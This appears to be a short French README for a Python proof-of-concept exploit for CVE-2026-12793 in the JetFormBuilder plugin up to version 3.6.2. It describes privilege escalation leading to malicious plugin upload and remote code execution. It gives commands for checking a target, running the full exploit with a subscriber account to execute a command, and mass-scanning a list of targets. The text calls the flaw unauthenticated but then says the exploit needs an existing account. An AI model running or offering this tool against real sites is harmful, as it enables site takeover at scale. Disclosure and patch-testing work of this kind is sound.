
PoC Python pour CVE-2026-12793 dans JetFormBuilder <= 3.6.2 : élévation de privilèges non authentifiée menant à l'upload de plugin et à l'exécution de code à distance, avec modes de vérification et de scan de masse.
Escalade de privilèges non authentifiée → téléversement de plugin → RCE.
<= 3.6.2>= 3.6.3# Vérifier une cible unique
python poc.py -u https://target.example --mode check
# Exploit complet (nécessite un compte à faibles privilèges existant)
python poc.py -u https://target.example --mode exploit \
-nu subscriber -np 'Password123' -c id
# Scan de masse
python poc.py -l targets.txt --mode check -t 30